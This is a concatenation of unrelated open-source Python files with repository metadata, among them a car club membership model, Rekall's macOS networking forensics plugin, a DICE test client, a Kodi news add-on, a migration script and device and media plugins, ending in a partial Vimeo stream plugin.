fieldlist.append(search.NumberField(name='kontingent' + str(index_due), value=paid_dues[index_due]))
# TODO: Add cars to index?
return search.Document(
doc_id=str(self.key()),
fields=fieldlist)
def update_index(self):
index = search.Index(name='members')
index.put(self.create_document())
    def generate_access_code(self):
        """Create an easily readable access code for profile editing"""
        import os
# This is the alphabet we can use; l, I, 1 and 0, O are obvious,
# S, 5 not so much, 8 and B a little less.
alphabet = 'CDEFHKNPRSTUVWXY46379'
maxlen = len(alphabet)
code = ''
for byte in os.urandom(8):
pos = ord(byte) % maxlen
code += alphabet[pos:pos+1]
self.edit_access_code = code
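# Hedged standalone version (not part of the model) of the scheme above.
# Note that ord(byte) % len(alphabet) carries a slight modulo bias, since 256
# is not a multiple of 21; for a short, human-friendly edit code that bias is
# harmless.
def _sketch_access_code(length=8):
    import os
    alphabet = 'CDEFHKNPRSTUVWXY46379'
    return ''.join(alphabet[ord(b) % len(alphabet)] for b in os.urandom(length))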
class MembershipDues(db.Model):
"""Payments for membership fees. One for each year. A new set of
payment entries will be created for each year. The structures parent
will be the member class."""
year = db.IntegerProperty(required=True)
paid = db.BooleanProperty(default=False, required=True)
class ModelRange(db.Model):
"""A model range. In almost all cases there are more than one model in
each range; this is the generic (like 'Spider', 'GTV', 'GT' and so on.)"""
name = db.StringProperty()
year_start = db.IntegerProperty()
year_end = db.IntegerProperty()
notes = db.TextProperty(required=False)
def model_count(self):
count = memcache.get(str(self.key()) + '_count')
if count is not None:
return count
return 0
class CarModel(db.Model):
"""A concrete model, like 'GTV 2.0i Twin Spark' or 'GTV 3.2i V6'"""
model_range = db.ReferenceProperty(ModelRange, collection_name='models')
name = db.StringProperty()
engine_code = db.StringProperty()
typeno = db.StringProperty()
image_url = db.LinkProperty()
year_from = db.IntegerProperty()
year_to = db.IntegerProperty()
notes = db.TextProperty(required=False)
def prettyprint(self):
if self.year_to == 0:
year_to = ''
else:
year_to = str(self.year_to)
return '%s - (%d - %s)' % (self.name, self.year_from, year_to)
class Car(db.Model):
"""A member's car. The parent structure will be the member owning the
car. """
member = db.ReferenceProperty(Member, collection_name='cars')
model = db.ReferenceProperty(CarModel, collection_name='cars')
registration = db.StringProperty()
bought_year = db.IntegerProperty(required=False)
sold_year = db.IntegerProperty(required=False)
year = db.IntegerProperty()
notes = db.TextProperty()
serial_no = db.StringProperty()
delete_on_save = db.BooleanProperty(required=False, default=False)
class User(db.Model):
"""User of the system"""
email = db.EmailProperty()
class ConfigTuple(db.Model):
"""Tuple for configuration parameters. The key names will be used to
name the configuration option."""
value = db.TextProperty()
|
KlubbAlfaRomeoNorge/members
|
model.py
|
Python
|
gpl-2.0
| 9,213
|
# Rekall Memory Forensics
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
__author__ = (
"Michael Cohen <scudette@google.com>",
"Adam Sindelar <adam.sindelar@gmail.com>")
from rekall import obj
from rekall import plugin
from rekall_lib import registry
from rekall.plugins.darwin import common
class DarwinUnpListCollector(common.AbstractDarwinProducer):
"""Walks the global list of sockets in uipc_usrreq."""
name = "unp_sockets"
type_name = "socket"
def collect(self):
for head_const in ["_unp_dhead", "_unp_shead"]:
lhead = self.session.profile.get_constant_object(
head_const,
target="unp_head")
for unp in lhead.lh_first.walk_list("unp_link.le_next"):
yield [unp.unp_socket]
class DarwinSocketsFromHandles(common.AbstractDarwinProducer):
"""Looks up handles that point to a socket and collects the socket."""
name = "open_sockets"
type_name = "socket"
def collect(self):
for fileproc in self.session.plugins.collect("fileproc"):
if fileproc.fg_type == "DTYPE_SOCKET":
yield [fileproc.autocast_fg_data()]
class DarwinNetstat(common.AbstractDarwinCommand):
"""Prints all open sockets we know about, from any source.
Netstat will display even connections that lsof doesn't know about, because
they were either recovered from an allocation zone, or found through a
secondary mechanism (like system call handler cache).
On the other hand, netstat doesn't know the file descriptor or, really, the
process that owns the connection (although it does know the PID of the last
process to access the socket.)
Netstat will also tell you, in the style of psxview, if a socket was only
found using some of the methods available.
"""
name = "netstat"
@classmethod
def methods(cls):
"""Return the names of available socket enumeration methods."""
# Find all the producers that collect procs and inherit from
# AbstractDarwinCachedProducer.
methods = []
for subclass in common.AbstractDarwinProducer.classes.itervalues():
# We look for a plugin which is a producer and a darwin command.
if (issubclass(subclass, common.AbstractDarwinCommand) and
issubclass(subclass, plugin.Producer) and
subclass.type_name == "socket"):
methods.append(subclass.name)
methods.sort()
return methods
@registry.classproperty
@registry.memoize
def table_header(cls): # pylint: disable=no-self-argument
header = [dict(name="socket", type="socket", width=60)]
for method in cls.methods():
header.append(dict(name=method, width=12))
return plugin.PluginHeader(*header)
def collect(self):
methods = self.methods()
for socket in sorted(self.session.plugins.collect("socket"),
key=lambda socket: socket.last_pid):
row = [socket]
for method in methods:
row.append(method in socket.obj_producers)
yield row
class DarwinGetArpListHead(common.AbstractDarwinParameterHook):
"""
One version of arp_init looks like this:
void
arp_init(void)
{
VERIFY(!arpinit_done);
LIST_INIT(&llinfo_arp); // <-- This is the global we want.
llinfo_arp_zone = zinit(sizeof (struct llinfo_arp),
LLINFO_ARP_ZONE_MAX * sizeof (struct llinfo_arp), 0,
LLINFO_ARP_ZONE_NAME);
if (llinfo_arp_zone == NULL)
panic("%s: failed allocating llinfo_arp_zone", __func__);
zone_change(llinfo_arp_zone, Z_EXPAND, TRUE);
zone_change(llinfo_arp_zone, Z_CALLERACCT, FALSE);
arpinit_done = 1;
}
Disassembled, the first few instructions look like this:
0x0 55 PUSH RBP
0x1 4889e5 MOV RBP, RSP
0x4 803d65e9400001 CMP BYTE [RIP+0x40e965], 0x1
0xb 7518 JNZ 0xff80090a7f95
0xd 488d3dee802900 LEA RDI, [RIP+0x2980ee]
0x14 488d35f5802900 LEA RSI, [RIP+0x2980f5]
0x1b baf3000000 MOV EDX, 0xf3
# This is a call to kernel!panic (later kernel!assfail):
0x20 e80b6c1400 CALL 0xff80091eeba0
# This is where it starts initializing the linked list:
0x25 48c70548e94000000000 MOV QWORD [RIP+0x40e948], 0x0
00
0x30 488d0d0e812900 LEA RCX, [RIP+0x29810e]
"""
name = "disassembled_llinfo_arp"
PANIC_FUNCTIONS = (u"__kernel__!_panic", u"__kernel__!_assfail")
def calculate(self):
resolver = self.session.address_resolver
arp_init = resolver.get_constant_object("__kernel__!_arp_init",
target="Function")
instructions = iter(arp_init.Decompose(20))
# Walk down to the CALL mnemonic and use the address resolver to
# see if it calls one of the panic functions.
for instruction in instructions:
# Keep spinning until we get to the first CALL.
if instruction.mnemonic != "CALL":
continue
# This is absolute:
target = instruction.operands[0].value
_, names = resolver.get_nearest_constant_by_address(target)
if not names:
return obj.NoneObject("Could not find CALL in arp_init.")
if names[0] not in self.PANIC_FUNCTIONS:
return obj.NoneObject(
"CALL was to %r, which is not on the PANIC list."
% names)
# We verified it's the right CALL. MOV should be right after it,
# so let's just grab it.
mov_instruction = next(instructions)
if mov_instruction.mnemonic != "MOV":
return obj.NoneObject("arp_init code changed.")
offset = (mov_instruction.operands[0].disp
+ mov_instruction.address
+ mov_instruction.size)
address = self.session.profile.Object(type_name="address",
offset=offset)
llinfo_arp = self.session.profile.Object(
type_name="llinfo_arp",
offset=address.v())
if llinfo_arp.isvalid:
return llinfo_arp.obj_offset
return obj.NoneObject("llinfo_arp didn't validate.")
class DarwinArp(common.AbstractDarwinProducer):
"""Show information about arp tables."""
name = "arp"
type_name = "rtentry"
def collect(self):
llinfo_arp = self.session.address_resolver.get_constant_object(
"__kernel__!_llinfo_arp",
target="Pointer",
target_args=dict(target="llinfo_arp"))
if not llinfo_arp:
# Must not have it in the profile. Try asking the session hook
# for the address.
offset = self.session.GetParameter("disassembled_llinfo_arp")
if not offset:
self.session.logging.error(
"Could not find the address of llinfo_arp.")
return
llinfo_arp = self.session.profile.Object(
type_name="llinfo_arp", offset=offset)
for arp_hit in llinfo_arp.walk_list("la_le.le_next"):
yield [arp_hit.la_rt]
class DarwinRoute(common.AbstractDarwinCommand):
"""Show routing table."""
__name = "route"
RNF_ROOT = 2
def rn_walk_tree(self, h):
"""Walks the radix tree starting from the header h.
This function is taken from
xnu-2422.1.72/bsd/net/radix.c: rn_walk_tree()
Which is why it does not conform to the style guide.
Note too that the darwin source code abuses C macros:
#define rn_dupedkey rn_u.rn_leaf.rn_Dupedkey
#define rn_key rn_u.rn_leaf.rn_Key
#define rn_mask rn_u.rn_leaf.rn_Mask
#define rn_offset rn_u.rn_node.rn_Off
#define rn_left rn_u.rn_node.rn_L
#define rn_right rn_u.rn_node.rn_R
And then the original code does:
rn = rn.rn_left
So we replace these below.
"""
rn = h.rnh_treetop
seen = set()
        # First time through node, go left
while rn.rn_bit >= 0:
rn = rn.rn_u.rn_node.rn_L
while rn and rn not in seen:
base = rn
seen.add(rn)
# If at right child go back up, otherwise, go right
while (rn.rn_parent.rn_u.rn_node.rn_R == rn and
not rn.rn_flags & self.RNF_ROOT):
rn = rn.rn_parent
# Find the next *leaf* to start from
rn = rn.rn_parent.rn_u.rn_node.rn_R
while rn.rn_bit >= 0:
rn = rn.rn_u.rn_node.rn_L
next = rn
# Process leaves
while True:
rn = base
if not rn:
break
base = rn.rn_u.rn_leaf.rn_Dupedkey
if not rn.rn_flags & self.RNF_ROOT:
yield rn
rn = next
if rn.rn_flags & self.RNF_ROOT:
return
def render(self, renderer):
renderer.table_header(
[("Source IP", "source", "20"),
("Dest IP", "dest", "20"),
("Interface", "interface", "9"),
("Sent", "sent", "8"),
("Recv", "recv", "8"),
("Time", "timestamp", "24"),
("Expires", "expires", "8"),
("Delta", "delta", "8")])
route_tables = self.profile.get_constant_object(
"_rt_tables",
target="Array",
target_args=dict(
count=32,
target="Pointer",
target_args=dict(
target="radix_node_head")))
for node in self.rn_walk_tree(route_tables[2]):
rentry = node.dereference_as("rtentry")
renderer.table_row(
rentry.source_ip,
rentry.dest_ip,
rentry.name,
rentry.sent, rentry.rx,
rentry.base_calendartime,
rentry.rt_expire,
rentry.delta)
class DarwinIfnetHook(common.AbstractDarwinParameterHook):
"""Walks the global list of interfaces.
The head of the list of network interfaces is a kernel global [1].
The struct we use [2] is just the public part of the data [3]. Addresses
are related to an interface in a N:1 relationship [4]. AF-specific data
is a normal sockaddr struct.
References:
1:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/dlil.c#L254
2:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/if_var.h#L528
3:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/dlil.c#L188
4:
https://github.com/opensource-apple/xnu/blob/10.9/bsd/net/if_var.h#L816
"""
name = "ifconfig"
# ifnet_head is the actual extern holding ifnets and seems to be an
# improvement over dlil_ifnet_head, which is a static and used only in the
# dlil (stands for data link interface, I think?) module.
IFNET_HEAD_NAME = ("_ifnet_head", "_dlil_ifnet_head")
def calculate(self):
ifnet_head = obj.NoneObject("No ifnet global names given.")
for name in self.IFNET_HEAD_NAME:
ifnet_head = self.session.profile.get_constant_object(
name,
target="Pointer",
target_args=dict(
target="ifnet"))
if ifnet_head:
break
return [x.obj_offset for x in ifnet_head.walk_list("if_link.tqe_next")]
class DarwinIfnetCollector(common.AbstractDarwinCachedProducer):
name = "ifconfig"
type_name = "ifnet"
class DarwinIPFilters(common.AbstractDarwinCommand):
"""Check IP Filters for hooks."""
__name = "ip_filters"
def render(self, renderer):
renderer.table_header([
("Context", "context", "10"),
("Filter", "filter", "16"),
("Handler", "handler", "[addrpad]"),
("Symbol", "symbol", "20")])
resolver = self.session.address_resolver
for list_name in ["_ipv4_filters", "_ipv6_filters"]:
filter_list = self.profile.get_constant_object(
list_name, target="ipfilter_list")
for item in filter_list.tqh_first.walk_list("ipf_link.tqe_next"):
filter = item.ipf_filter
name = filter.name.deref()
handler = filter.ipf_input.deref()
renderer.table_row("INPUT", name, handler,
resolver.format_address(handler))
handler = filter.ipf_output.deref()
renderer.table_row("OUTPUT", name, handler,
resolver.format_address(handler))
handler = filter.ipf_detach.deref()
renderer.table_row("DETACH", name, handler,
resolver.format_address(handler))
|
dsweet04/rekall
|
rekall-core/rekall/plugins/darwin/networking.py
|
Python
|
gpl-2.0
| 13,974
|
from __future__ import print_function
import argparse
import collections
import io
import json
import logging
import os
# pylint: disable=import-error
import queue
import random
import re
import requests
import sys
import traceback
import threading
import time
from ..core import provider
from ..utils import rnd
from . import window
logger = logging.getLogger('dice')
class _TestThread(threading.Thread):
"""
Thread class for running the main tests.
"""
def __init__(self, exc_queue, app, **kwargs):
threading.Thread.__init__(self, **kwargs)
self.exc_queue = exc_queue
self.app = app
def run(self):
try:
self.app.run_tests()
# pylint: disable=broad-except
except Exception:
self.exc_queue.put(sys.exc_info())
class _TestStat(object):
"""
Class to store the tests and statistics information.
"""
def __init__(self, key, queue_max=100, method='exact'):
self.key = key
self.counter = 0
self.queue_max = queue_max
self.method = method
self.queue = collections.deque([], queue_max)
def match(self, text):
if self.method == 'exact':
return text == self.key
elif self.method == 'regex':
return re.match(self.key + '$', text)
def append(self, result):
self.counter += 1
self.queue.append(result)
def extend(self, stat):
for result in stat.queue:
self.append(result)
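# Hedged illustration (not part of dice): 'regex' stats anchor the pattern
# with a trailing '$' so the key must match the whole text; re.match already
# anchors the start.
def _demo_stat_match():
    exact = _TestStat('timeout')
    rx = _TestStat('time.*', method='regex')
    assert exact.match('timeout') and not exact.match('timeout!')
    assert rx.match('timeout!') and not rx.match('some timeout')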
class DiceApp(object):
"""
Curses-based DICE client application.
"""
def __init__(self):
self.parser = argparse.ArgumentParser()
self.parser.add_argument(
'providers',
nargs='?',
action='store',
help="list of test providers separated by ','. Default to current "
"working directory",
default=os.getcwd(),
)
self.parser.add_argument(
'--server',
action='store',
help='server address',
dest='server',
default=None,
)
self.parser.add_argument(
'--port',
action='store',
help='server port',
dest='port',
default='8067',
)
self.parser.add_argument(
'--username',
action='store',
help='server authentication user name',
dest='username',
)
self.parser.add_argument(
'--password',
action='store',
help='server authentication password',
dest='password',
)
self.parser.add_argument(
'--no-ui',
action='store_false',
help="don't show terminal interactive user interface.",
dest='ui',
default=True,
)
self.args, _ = self.parser.parse_known_args()
try:
self.providers = self._process_providers()
except provider.ProviderError as detail:
exit(detail)
self.stats = {
"skip": {},
"failure": {},
"success": {},
"timeout": {},
"expected_neg": {},
"unexpected_neg": {},
"unexpected_pass": {},
}
self.QUEUE_MAX = 100
self.exiting = False
self.pause = False
self.setting_watch = False
self.show_log = False
self.watching = ''
self.scroll_x = 0
self.scroll_y = 0
self.test_excs = queue.Queue()
self.test_thread = _TestThread(self.test_excs, self)
self.send_queue = []
self.last_send_thread = None
self.last_item = None
self.cur_counter = 'failure'
if self.args.ui:
self.window = window.Window(self)
self.window.stat_panel.set_select_callback(self._update_items)
self.window.stat_panel.add_keypress_listener(
'merge_stat', 'm', self._merge_stat)
self.window.items_panel.set_select_callback(self._update_content)
self.stream = io.StringIO()
self.cur_class = (None, None)
self.cur_item = (None, None)
def _update_items(self, cat_name, item_idx):
self.cur_class = (cat_name, item_idx)
def _update_content(self, cat_name, item_idx):
self.cur_item = (cat_name, item_idx)
def _merge_stat(self, panel):
self.pause = True
cat_name, _ = panel.cur_key
text = self.window.get_input()
match_keys = []
for key in self.stats[cat_name]:
res = re.match(text, key)
if res is not None:
match_keys.append(key)
stat = self.stats[cat_name][text] = _TestStat(text, method='regex')
for key in match_keys:
stat.extend(self.stats[cat_name][key])
del self.stats[cat_name][key]
self.pause = False
def _stat_result(self, item):
"""
Categorizes and keep the count of a result of a test item depends on
the expected failure patterns.
"""
res = item.res
fail_patts = item.fail_patts
key = res.stderr
catalog = None
if res:
if res.exit_status == 'timeout':
catalog = 'timeout'
if self.watching and self.watching in res.stderr:
self.pause = True
if fail_patts:
if res.exit_status == 'success':
catalog = 'unexpected_pass'
elif res.exit_status == 'failure':
found = False
for patt in fail_patts:
if re.search(patt, res.stderr):
catalog = 'expected_neg'
key = patt
found = True
break
if not found:
catalog = 'unexpected_neg'
else:
if res.exit_status == 'success':
catalog = 'success'
elif res.exit_status == 'failure':
catalog = 'failure'
else:
catalog = 'skip'
found = False
for stat in self.stats[catalog].values():
if stat.match(key):
found = True
key = stat.key
break
if not found:
self.stats[catalog][key] = _TestStat(key)
stat = self.stats[catalog][key]
stat.append(res)
def _process_providers(self):
"""
Print a list of available providers if --list-providers is set
or return a dict of specified providers.
"""
providers = {}
if self.args.providers:
for path in self.args.providers.split(','):
prvdr = provider.Provider(path)
providers[prvdr.name] = prvdr
else:
sys.exit('Error: --providers option not specified')
return providers
def _send(self, item_queue):
"""
Serialize a list of test results and send them to remote server.
"""
content = []
for item in item_queue:
content.append(item.serialize())
data = json.dumps(content)
headers = {}
headers['content-type'] = 'application/json'
url = 'http://%s:%s/api/tests/' % (self.args.server, self.args.port)
try:
response = requests.post(
url,
data=data,
headers=headers,
auth=(self.args.username, self.args.password),
)
if response.status_code != 201:
logger.debug('Failed to send result (HTTP%s):',
response.status_code)
if 'DOCTYPE' in response.text:
html_path = 'debug_%s.html' % rnd.regex('[a-z]{4}')
with open(html_path, 'w') as fp:
fp.write(response.text)
logger.debug('Html response saved to %s',
os.path.abspath(html_path))
else:
logger.debug(response.text)
except requests.ConnectionError as detail:
logger.debug('Failed to send result to server: %s', detail)
def run_tests(self):
"""
Iteratively run tests.
"""
while not self.exiting:
            item = random.choice(list(self.providers.values())).generate()
item.run()
self.last_item = item
if self.args.server is not None:
self.send_queue.append(item)
if len(self.send_queue) > 200:
if self.last_send_thread:
self.last_send_thread.join()
send_thread = threading.Thread(
target=self._send,
args=(self.send_queue,)
)
send_thread.start()
self.last_send_thread = send_thread
self.send_queue = []
self._stat_result(item)
if self.pause:
while self.pause and not self.exiting:
time.sleep(0.5)
def update_window(self):
"""
Update the content of curses window and refresh it.
"""
# Set statistics panel content
panel = self.window.stat_panel
panel.clear()
for cat_name in self.stats:
for key, stat in self.stats[cat_name].items():
bundle = {'key': key, 'count': stat.counter}
panel.add_item(bundle, catalog=cat_name)
# Set items panel content
panel = self.window.items_panel
panel.clear()
cat_name, item_idx = self.cur_class
if cat_name is not None and item_idx is not None:
            item_name, stat = list(self.stats[cat_name].items())[item_idx]
try:
for item in self.stats[cat_name][item_name].queue:
bundle = {'item': item.cmdline}
panel.add_item(bundle)
except RuntimeError:
pass
# Set detail panel content
panel = self.window.detail_panel
panel.clear()
cat_name, item_idx = self.cur_class
if cat_name is not None and item_idx is not None:
            item_name, stat = list(self.stats[cat_name].items())[item_idx]
items = self.stats[cat_name][item_name].queue
item_name, item_idx = self.cur_item
if item_name is not None and item_idx is not None:
bundle = items[self.cur_item[1]]
panel.set_content(bundle)
self.window.update()
def run(self):
"""
Main loop to run tests, update screen and send tests results.
"""
shandler = logging.StreamHandler(self.stream)
logger.setLevel(logging.WARNING)
for handler in logger.handlers:
logger.removeHandler(handler)
logger.addHandler(shandler)
os.environ["EDITOR"] = "echo"
self.last_item = None
if self.args.ui:
try:
self.test_thread.start()
while True:
if self.args.ui:
self.update_window()
if self.exiting:
break
                    if not self.test_thread.is_alive():
break
except KeyboardInterrupt:
pass
finally:
if self.args.ui:
self.window.destroy()
self.exiting = True
self.test_thread.join()
try:
exc = self.test_excs.get(block=False)
for line in traceback.format_exception(*exc):
print(line, end='')
except queue.Empty:
pass
else:
self.run_tests()
|
code-dice/dice
|
dice/client/__init__.py
|
Python
|
gpl-2.0
| 12,056
|
import sys, xbmcplugin, xbmcgui,xbmc
_id = "plugin.video.italian-news"
_resdir = "special://home/addons/" + _id + "/resources"
_thisPlugin = int(sys.argv[1])
_icons = _resdir + "/icons/"
sys.path.append( xbmc.translatePath(_resdir + "/lib/"))
import rai
_tg1Icon=xbmc.translatePath(_icons +"Tg1_logo.png")
_tg2Icon=xbmc.translatePath(_icons +"Tg2_logo.png")
_tg3Icon=xbmc.translatePath(_icons +"Tg3_logo.png")
def _addItem(label,uri,icon,isFolder=False):
item = xbmcgui.ListItem(label, iconImage=icon)
xbmcplugin.addDirectoryItem(_thisPlugin,uri,item,isFolder)
def _get_params():
param=[]
paramstring=sys.argv[2]
if len(paramstring)>=2:
        params=sys.argv[2]
        if (params[len(params)-1]=='/'):
            params=params[0:len(params)-1]
        cleanedparams=params.replace('?','')
        pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
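# Hedged note (not in the original add-on): the hand-rolled parser above is
# roughly equivalent to the Python 2 stdlib's urlparse.parse_qs, which returns
# a dict of value lists rather than plain strings.
def _get_params_stdlib():
    import urlparse
    qs = sys.argv[2].lstrip('?').rstrip('/')
    return dict((k, v[0]) for k, v in urlparse.parse_qs(qs).items())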
param = _get_params()
plugins = {
'1':(rai.RaiUno, 'Guarda il TG1',_tg1Icon),
'2':(rai.RaiDue, 'Guarda il TG2',_tg2Icon),
'3':(rai.RaiTre, 'Guarda il TG3',_tg3Icon)
}
if 'plugin' in param:
(engine, title, eicon)=plugins[param['plugin']]
for (name,url,icon) in engine().get():
if icon == '':
icon = eicon
_addItem(name,url,icon)
xbmcplugin.endOfDirectory(_thisPlugin)
else:
for n in sorted(plugins.iterkeys()):
(engine, title, icon)=plugins[n]
print title
_addItem(title,sys.argv[0]+'?plugin='+n,icon,isFolder=True)
xbmcplugin.endOfDirectory(_thisPlugin)
#for (name,url,icon) in tg1:
# _addItem(name,url,icon)
#xbmcplugin.endOfDirectory(_thisPlugin)
|
mikpin/plugin.video.italian-news
|
default.py
|
Python
|
gpl-2.0
| 1,928
|
#!/usr/bin/python3
def sanitize(time_string):
if '-' in time_string:
splitter = '-'
elif ':' in time_string:
splitter = ':'
else:
return(time_string)
(mins, secs) = time_string.strip().split(splitter)
return(mins + '.' + secs)
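# Hedged self-check (not in the original exercise): all three accepted time
# formats normalize to 'mins.secs'.
def _check_sanitize():
    assert sanitize('2-58') == '2.58'
    assert sanitize('2:58') == '2.58'
    assert sanitize('2.58') == '2.58'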
def get_coach_data(filename):
try:
with open(filename) as fn:
data = fn.readline()
return(data.strip().split(','))
except IOError as ioerr:
print('File Error:' + str(ioerr))
return(None)
sarah = get_coach_data('sarah2.txt')
(sarah_name, sarah_dob) = sarah.pop(0), sarah.pop(0)
print(sarah_name + "'s fastest time are:"+
str(sorted(set([sanitize(t) for t in sarah]))[0:3]))
|
clovemfeng/studydemo
|
20140617/userlist_data.py
|
Python
|
gpl-2.0
| 657
|
"""Add default COMPILE_YARA_RULE_ON_SAVE setting
Revision ID: af2de80654b6
Revises: 2f0f6d26a505
Create Date: 2018-11-11 19:26:53.631142
"""
from alembic import op
import sqlalchemy as sa
from app.models import cfg_settings
import datetime
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'af2de80654b6'
down_revision = '2f0f6d26a505'
branch_labels = None
depends_on = None
def upgrade():
date_created = datetime.datetime.now().isoformat()
date_modified = datetime.datetime.now().isoformat()
op.bulk_insert(
cfg_settings.Cfg_settings.__table__,
[
{"key": "COMPILE_YARA_RULE_ON_SAVE", "value": "1", "public": True, "date_created": date_created,
"date_modified": date_modified,
"description": "If true, don't save yara rule changes if they are in the draft or release state unless they compile."},
]
)
def downgrade():
keys = ["COMPILE_YARA_RULE_ON_SAVE"]
for key in keys:
op.execute("""DELETE from cfg_settings where `key`='%s';""" % (key))
|
InQuest/ThreatKB
|
migrations/versions/af2de80654b6_add_default_compile_yara_rule_on_save_.py
|
Python
|
gpl-2.0
| 1,083
|
#!/usr/bin/env python
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import moviedata
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.movies = moviedata.MovieContainer()
self.table = QTableWidget()
self.setCentralWidget(self.table)
def updateTable(self, current=None):
self.table.clear()
self.table.setRowCount(len(self.movies))
self.table.setColumnCount(5)
self.table.setHorizontalHeaderLabels(['Title',
'Year', 'Mins', 'Acquired', 'Notes'])
self.table.setAlternatingRowColors(True)
self.table.setEditTriggers(QTableWidget.NoEditTriggers)
self.table.setSelectionBehavior(QTableWidget.SelectRows)
self.table.setSelectionMode(QTableWidget.SingleSelection)
selected = None
|
opensvn/python
|
mymovies.py
|
Python
|
gpl-2.0
| 877
|
# -*- coding: utf-8 -*-
# Copyright (C) 2011-2012 Vodafone España, S.A.
# Author: Andrew Bird
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from wader.common.consts import WADER_CONNTYPE_USB
from core.hardware.zte import (ZTEWCDMADevicePlugin,
ZTEWCDMACustomizer,
ZTEWrapper)
class ZTEMF180Wrapper(ZTEWrapper):
def send_ussd(self, ussd):
"""Sends the ussd command ``ussd``"""
# XXX: assumes it's the same as 637U
# MF180 wants request in ascii chars even though current
# set might be ucs2
return super(ZTEMF180Wrapper, self).send_ussd(ussd, force_ascii=True)
class ZTEMF180Customizer(ZTEWCDMACustomizer):
wrapper_klass = ZTEMF180Wrapper
class ZTEMF180(ZTEWCDMADevicePlugin):
""":class:`~core.plugin.DevicePlugin` for ZTE's MF180"""
name = "ZTE MF180"
version = "0.1"
author = u"Andrew Bird"
custom = ZTEMF180Customizer()
__remote_name__ = "MF180"
__properties__ = {
'ID_VENDOR_ID': [0x19d2],
'ID_MODEL_ID': [0x2003],
}
conntype = WADER_CONNTYPE_USB
zte_mf180 = ZTEMF180()
|
andrewbird/wader
|
plugins/devices/zte_mf180.py
|
Python
|
gpl-2.0
| 1,826
|
# Sketch - A Python-based interactive drawing program
# Copyright (C) 1999 by Bernhard Herzog
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Select all objects in the current layer with the same fill color as
# the currently selected object. This is implemented as an advanced
# script. It doesn't have to deal with undo because it only changes the
# set of currently selected objects and not the objects themselves.
#
# Concepts and Methods:
#
# CurrentProperties():
#
# This document method returns the properties of the currently
# selected object. If more than one objects are selected or no
# object is selected or the selected object doesn't have
# properties, a special property object EmptyProperties is
# returned.
#
# Now, what does this mean? Objects like rectangles, text and
# curves have graphics properties like fill or line patterns, line
# width or font, whatever is applicable for that particular type.
# Some objects have no graphics properties at all, e.g. groups,
# while others can only have some properties, e.g. text objects
# currently can't have a line color (this is really a limitation
# in X11, PostScript wouldn't have problems with that).
#
# All of the properties are stored in a properties object, and
# that is what the CurrentProperties() method returns. Such a
# properties object has three methods that indicate whether the
# fill-, line- or text properties are valid: HasFill(), HasLine()
# and HasFont(). Only if one of those methods returns true, can
# you safely access the respective properties. The properties are
# publicly readable attributes of the properties object. For the
# EmptyProperties object that may be returned by
# CurrentProperties(), all of these methods return false.
#
import time
def select_same_fill_color(context):
doc = context.document
select = []
properties = doc.CurrentProperties()
if properties.HasFill():
color = properties.fill_pattern.Color()
layer = doc.ActiveLayer()
doc.SelectNone()
for obj in layer.GetObjects():
if obj.has_fill:
prop = obj.Properties()
if prop.HasFill() and prop.fill_pattern.is_Solid \
and color == prop.fill_pattern.Color():
select.append(obj)
doc.SelectObject(select, Sketch.const.SelectAdd)
# register script
import Sketch.Scripting
Sketch.Scripting.AddFunction('select_same_fill_color',
'Select Same Fill Color',
select_same_fill_color,
script_type = Sketch.Scripting.AdvancedScript)
|
shumik/skencil-c
|
Script/select_same_fill_color.py
|
Python
|
gpl-2.0
| 3,431
|
import logging
import re
from streamlink.compat import html_unescape, urlparse
from streamlink.plugin import Plugin, PluginArguments, PluginArgument
from streamlink.plugin.api import validate
from streamlink.stream import DASHStream, HLSStream, HTTPStream
from streamlink.stream.ffmpegmux import MuxedStream
from streamlink.utils import parse_json
log = logging.getLogger(__name__)
class Vimeo(Plugin):
_url_re = re.compile(r"https?://(player\.vimeo\.com/video/\d+|(www\.)?vimeo\.com/.+)")
_config_url_re = re.compile(r'(?:"config_url"|\bdata-config-url)\s*[:=]\s*(".+?")')
_config_re = re.compile(r"var\s+config\s*=\s*({.+?})\s*;")
_config_url_schema = validate.Schema(
validate.transform(_config_url_re.search),
validate.any(
None,
validate.Schema(
validate.get(1),
validate.transform(parse_json),
validate.transform(html_unescape),
validate.url(),
),
),
)
_config_schema = validate.Schema(
validate.transform(parse_json),
{
"request": {
"files": {
validate.optional("dash"): {"cdns": {validate.text: {"url": validate.url()}}},
validate.optional("hls"): {"cdns": {validate.text: {"url": validate.url()}}},
validate.optional("progressive"): validate.all(
[{"url": validate.url(), "quality": validate.text}]
),
},
validate.optional("text_tracks"): validate.all(
